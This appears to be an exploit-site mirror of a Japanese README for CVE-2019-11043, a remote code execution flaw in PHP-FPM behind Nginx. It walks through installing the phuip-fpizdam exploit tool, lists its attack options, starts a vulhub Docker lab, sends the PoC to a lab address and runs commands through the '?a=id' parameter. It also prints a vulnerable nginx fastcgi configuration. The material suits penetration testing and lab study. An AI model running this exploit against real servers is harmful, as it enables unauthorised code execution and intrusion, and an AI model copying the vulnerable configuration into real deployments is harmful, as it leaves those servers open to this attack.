Sploitus

Exploit for CVE-2019-11043

kitploit · 2026-08-26

Exploit Code

MARKDOWN173 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2019-11043
# CVE-2019-11043 php-fpm+Nginx RCE

## 0x01 phuip-fpizdam-Mac のインストール

`go get github.com/neex/phuip-fpizdam`

`go install github.com/neex/phuip-fpizdam`

![](https://assets.kitploit.com/production/public/readmes/27332/ece15043d649c72a2fb5e10194e1a5cf60e3811b9ecee62c7c54dbd35f2ae6fc.jpg)

root@kitploit:~
    
    
    ale@Pentest ~/go go get github.com/neex/phuip-fpizdam
    ale@Pentest ~/go go install github.com/neex/phuip-fpizdam
    ale@Pentest ~/go ls
    bin src
    
    ale@Pentest ~/go cd bin
    ale@Pentest ~/go/bin ls
    phuip-fpizdam
    
    ale@Pentest ~/go/bin file phuip-fpizdam
    phuip-fpizdam: Mach-O 64-bit executable x86_64
    
    ale@Pentest ~/go/bin ls -lah phuip-fpizdam
    -rwxr-xr-x  1 ale  staff   9.3M Oct 24 07:30 phuip-fpizdam
    
    ale@Pentest ~/go/bin
    

##### phuip-fpizdam help

root@kitploit:~
    
    
    ./phuip-fpizdam
    
    Error: accepts 1 arg(s), received 0
    Usage:
      phuip-fpizdam [url] [flags]
    
    Flags:
          --cookie string       send this cookie
      -h, --help                help for phuip-fpizdam
          --kill-count int      how many times to send the worker killing payload (default 50)
          --kill-workers        just kill php-fpm workers (requires only QSL)
          --method string       detect method (see detect_methods.go) (default "session.auto_start")
          --only-qsl            stop after QSL detection, use this if you just want to check if the server is vulnerable
          --pisos int           pisos hint
          --qsl int             qsl hint
          --reset-retries int   how many retries to do for --reset-setting, -1 means a lot (default 50)
          --reset-setting       try to reset setting (requires attack params)
          --setting string      specify custom php.ini setting for --reset-setting
          --skip-attack         skip attack phase
          --skip-detect         skip detection phase
    
    2019/10/24 07:53:55 accepts 1 arg(s), received 0
    
    

## 0x02 phuip-fpizdam-Windows のインストール

`https://github.com/neex/phuip-fpizdam/archive/master.zip`

`go build`

![](https://assets.kitploit.com/production/public/readmes/27332/71865b6b320be844c2c916835d5030e8d9db594adb4e28a9c677df47eee3ecc5.jpg)

## 0x03 CVE-2019-11043 用 Docker

root@kitploit:~
    
    
    root@kali:~# cd ~/vulhub/php/CVE-2019-11043
    
    root@kali:~/vulhub/php/CVE-2019-11043# ls
    
    1.png  2.png  default.conf  docker-compose.yml  README.md  www
    
    root@kali:~/vulhub/php/CVE-2019-11043# docker-compose up -d
    
    Creating network "cve-2019-11043_default" with the default driver
    Creating cve-2019-11043_php_1 ... done
    Creating cve-2019-11043_nginx_1 ... done
    root@kali:~/vulhub/php/CVE-2019-11043#
    
    
    root@kali:~/vulhub/php/CVE-2019-11043# docker ps -a
    CONTAINER ID  IMAGE  COMMAND  CREATED  STATUS  PORTS  NAMES
    
    9923d12fdff0 nginx:1 "nginx -g 'daemon of…" 43 seconds ago Up 41 seconds 0.0.0.0:8080->80/tcp cve-2019-11043_nginx_1
    
    d3135c708e7b php:7.2.10-fpm "docker-php-entrypoi…" 44 seconds ago Up 42 seconds 9000/tcp cve-2019-11043_php_1
    
    

![](https://assets.kitploit.com/production/public/readmes/27332/ed58276123aa9cce965d3ea75eb8cddcbb89744b2820323cc9dbf6d93fb4589c.png)

## 0x04 PoC の送信

`./phuip-fpizdam http://10.10.20.166:8080/index.php`

![](https://assets.kitploit.com/production/public/readmes/27332/ced2efc77143397b73b83db280db749914d18322deba149f2c9cfe34acf87a93.jpg)

`http://10.10.20.166:8080/index.php?a=id`

![](https://assets.kitploit.com/production/public/readmes/27332/9cc729e4824d2f619b721628d884c01423a4b30f182f82835b79af206d7795f0.jpg)

## Python による脆弱性チェック.

`python php-rce-check.py`

![](https://assets.kitploit.com/production/public/readmes/27332/46f15822228e50d401b157e998bcc933f7ac5b4ea4b8635eb709482ccd54662e.jpg)

![](https://assets.kitploit.com/production/public/readmes/27332/19f57f7f8149e749fff2006e6f5e5447020486155d724a5d3352596746a122a9.jpg)

## nginx の設定

`/etc/nginx/conf.d/default.conf`

example:

root@kitploit:~
    
    
    server {
        listen 80 default_server;
        listen [::]:80 default_server;
    
        root /usr/share/nginx/html;
    
        index index.html index.php;
    
        server_name _;
    
        location / {
            try_files $uri $uri/ =404;
        }
    
        location ~ [^/]\.php(/|$) {
            fastcgi_split_path_info ^(.+?\.php)(/.*)$;
            include fastcgi_params;
    
            fastcgi_param PATH_INFO       $fastcgi_path_info;
            fastcgi_index index.php;
            fastcgi_param  REDIRECT_STATUS    200;
            fastcgi_param  SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
            fastcgi_param  DOCUMENT_ROOT /var/www/html;
            fastcgi_pass php:9000;
        }
    
    }
    

## バージョン

root@kitploit:~
    
    
    root@7c20aecd9c04:/usr/share/nginx/html# nginx -v
    nginx version: nginx/1.19.2
    
    phpinfo();
    PHP Version 7.2.10
    

## 0x05 参考リンク

https://github.com/neex/phuip-fpizdam

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043